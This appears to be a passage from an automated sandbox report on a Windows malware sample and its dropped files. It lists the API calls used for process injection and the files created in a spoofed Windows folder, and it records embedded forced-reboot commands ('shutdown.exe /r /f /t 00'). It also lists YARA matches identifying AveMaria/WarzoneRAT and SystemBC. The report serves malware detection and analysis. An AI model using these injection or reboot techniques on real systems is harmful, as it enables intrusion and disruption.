Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02F2DBB0
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02F28D6E
Source: C:\Users\Public\alpha.pif Code function: 8_2_00547460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 8_2_00547460
Source: C:\Users\Public\alpha.pif Code function: 8_2_0053643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 8_2_0053643A
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 8_2_00534823
Source: C:\Users\Public\alpha.pif Code function: 8_2_005364CA NtQueryInformationToken, 8_2_005364CA
Source: C:\Users\Public\alpha.pif Code function: 8_2_00536500 NtQueryInformationToken,NtQueryInformationToken, 8_2_00536500
Source: C:\Users\Public\alpha.pif Code function: 8_2_0054A135 NtSetInformationFile, 8_2_0054A135
Source: C:\Users\Public\alpha.pif Code function: 8_2_0054C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 8_2_0054C1FA
Source: C:\Users\Public\alpha.pif Code function: 8_2_00524E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 8_2_00524E3B
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 8_2_00534759
Source: C:\Users\Public\alpha.pif Code function: 12_2_00547460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer, 12_2_00547460
Source: C:\Users\Public\alpha.pif Code function: 12_2_0053643A NtOpenThreadToken,NtOpenProcessToken,NtClose, 12_2_0053643A
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx, 12_2_00534823
Source: C:\Users\Public\alpha.pif Code function: 12_2_005364CA NtQueryInformationToken, 12_2_005364CA
Source: C:\Users\Public\alpha.pif Code function: 12_2_00536500 NtQueryInformationToken,NtQueryInformationToken, 12_2_00536500
Source: C:\Users\Public\alpha.pif Code function: 12_2_0054A135 NtSetInformationFile, 12_2_0054A135
Source: C:\Users\Public\alpha.pif Code function: 12_2_0054C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 12_2_0054C1FA
Source: C:\Users\Public\alpha.pif Code function: 12_2_00524E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp, 12_2_00524E3B
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError, 12_2_00534759
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD8670 NtUnmapViewOfSection, 19_2_02DD8670
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD8400 NtReadVirtualMemory, 19_2_02DD8400
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD7A2C NtAllocateVirtualMemory, 19_2_02DD7A2C
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD7D78 NtWriteVirtualMemory, 19_2_02DD7D78
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_02DD8D70
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DDDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 19_2_02DDDD70
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD86F7 NtUnmapViewOfSection, 19_2_02DD86F7
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD7AC9 NtAllocateVirtualMemory, 19_2_02DD7AC9
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD7A2A NtAllocateVirtualMemory, 19_2_02DD7A2A
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DDDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 19_2_02DDDBB0
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DDDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 19_2_02DDDC8C
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DDDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 19_2_02DDDC04
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DD8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 19_2_02DD8D6E
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB8670 NtUnmapViewOfSection, 22_2_02EB8670
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB8400 NtReadVirtualMemory, 22_2_02EB8400
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB7A2C NtAllocateVirtualMemory, 22_2_02EB7A2C
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB7D78 NtWriteVirtualMemory, 22_2_02EB7D78
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02EB8D70
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EBDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 22_2_02EBDD70
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB86F7 NtUnmapViewOfSection, 22_2_02EB86F7
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB7A2A NtAllocateVirtualMemory, 22_2_02EB7A2A
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EBDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 22_2_02EBDBB0
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EBDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 22_2_02EBDC8C
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EBDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 22_2_02EBDC04
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EB8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 22_2_02EB8D6E
Contains functionality to communicate with device drivers
Source: C:\Users\Public\alpha.pif Code function: 8_2_00524C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z, 8_2_00524C10
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess, 0_2_02F2F7C8
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /f /t 00 10_2_0040314B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /t 00 10_2_0040314B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /f /t 00 21_2_0040314B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec, shutdown.exe /r /t 00 21_2_0040314B
Creates files inside the system directory
Source: C:\Users\Public\alpha.pif File created: C:\Windows Jump to behavior
Source: C:\Users\Public\alpha.pif File created: C:\Windows \SysWOW64 Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\Public\alpha.pif File deleted: C:\Windows \SysWOW64 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F120C4 0_2_02F120C4
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534875 8_2_00534875
Source: C:\Users\Public\alpha.pif Code function: 8_2_00524C10 8_2_00524C10
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052540A 8_2_0052540A
Source: C:\Users\Public\alpha.pif Code function: 8_2_005274B1 8_2_005274B1
Source: C:\Users\Public\alpha.pif Code function: 8_2_0054695A 8_2_0054695A
Source: C:\Users\Public\alpha.pif Code function: 8_2_00529144 8_2_00529144
Source: C:\Users\Public\alpha.pif Code function: 8_2_00544191 8_2_00544191
Source: C:\Users\Public\alpha.pif Code function: 8_2_00526E57 8_2_00526E57
Source: C:\Users\Public\alpha.pif Code function: 8_2_00543E66 8_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052D660 8_2_0052D660
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052EE03 8_2_0052EE03
Source: C:\Users\Public\alpha.pif Code function: 8_2_00527A34 8_2_00527A34
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534EC1 8_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 8_2_0054769E 8_2_0054769E
Source: C:\Users\Public\alpha.pif Code function: 8_2_00535A86 8_2_00535A86
Source: C:\Users\Public\alpha.pif Code function: 8_2_00533EB3 8_2_00533EB3
Source: C:\Users\Public\alpha.pif Code function: 8_2_00530740 8_2_00530740
Source: C:\Users\Public\alpha.pif Code function: 8_2_00526B20 8_2_00526B20
Source: C:\Users\Public\alpha.pif Code function: 8_2_00530BF0 8_2_00530BF0
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00415B64 10_2_00415B64
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004024BB 10_2_004024BB
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534875 12_2_00534875
Source: C:\Users\Public\alpha.pif Code function: 12_2_00524C10 12_2_00524C10
Source: C:\Users\Public\alpha.pif Code function: 12_2_0052540A 12_2_0052540A
Source: C:\Users\Public\alpha.pif Code function: 12_2_005274B1 12_2_005274B1
Source: C:\Users\Public\alpha.pif Code function: 12_2_0054695A 12_2_0054695A
Source: C:\Users\Public\alpha.pif Code function: 12_2_00529144 12_2_00529144
Source: C:\Users\Public\alpha.pif Code function: 12_2_00544191 12_2_00544191
Source: C:\Users\Public\alpha.pif Code function: 12_2_00526E57 12_2_00526E57
Source: C:\Users\Public\alpha.pif Code function: 12_2_00543E66 12_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 12_2_0052D660 12_2_0052D660
Source: C:\Users\Public\alpha.pif Code function: 12_2_0052EE03 12_2_0052EE03
Source: C:\Users\Public\alpha.pif Code function: 12_2_00527A34 12_2_00527A34
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534EC1 12_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 12_2_0054769E 12_2_0054769E
Source: C:\Users\Public\alpha.pif Code function: 12_2_00535A86 12_2_00535A86
Source: C:\Users\Public\alpha.pif Code function: 12_2_00533EB3 12_2_00533EB3
Source: C:\Users\Public\alpha.pif Code function: 12_2_00530740 12_2_00530740
Source: C:\Users\Public\alpha.pif Code function: 12_2_00526B20 12_2_00526B20
Source: C:\Users\Public\alpha.pif Code function: 12_2_00530BF0 12_2_00530BF0
Source: C:\Users\Public\xpha.pif Code function: 13_2_00D41E26 13_2_00D41E26
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DC20C4 19_2_02DC20C4
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DCC9DE 19_2_02DCC9DE
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 19_2_02DCC98E 19_2_02DCC98E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00415B64 21_2_00415B64
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004024BB 21_2_004024BB
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: 22_2_02EA20C4 22_2_02EA20C4
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\kwtqutrL.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Found potential string decryption / allocating functions
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02DC4860 appears 683 times
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02DC46D4 appears 155 times
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02EA46D4 appears 155 times
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02DD894C appears 50 times
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02EB894C appears 50 times
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Code function: String function: 02EA4860 appears 683 times
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: String function: 0040FB4B appears 32 times
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: String function: 004043FA appears 80 times
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: String function: 0041473A appears 104 times
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: String function: 0040460A appears 88 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F2894C appears 56 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F289D0 appears 45 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F146D4 appears 244 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F14500 appears 33 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F14860 appears 949 times
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: String function: 02F144DC appears 74 times
Sample file is different than original file name gathered from version info
Source: qqig1mHX8U.exe Binary or memory string: OriginalFilename vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2398965096.0000000021C5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2415926480.0000000002D82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021C52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2302443683.0000000002D84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2444847577.000000007FA2F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021C23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB9F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB9F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2302443683.0000000002D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2301265871.000000007FC5F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000003.2398965096.0000000021BFD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2415926480.0000000002D7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs qqig1mHX8U.exe
Source: qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs qqig1mHX8U.exe
Uses 32bit PE files
Source: qqig1mHX8U.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Yara signature match
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
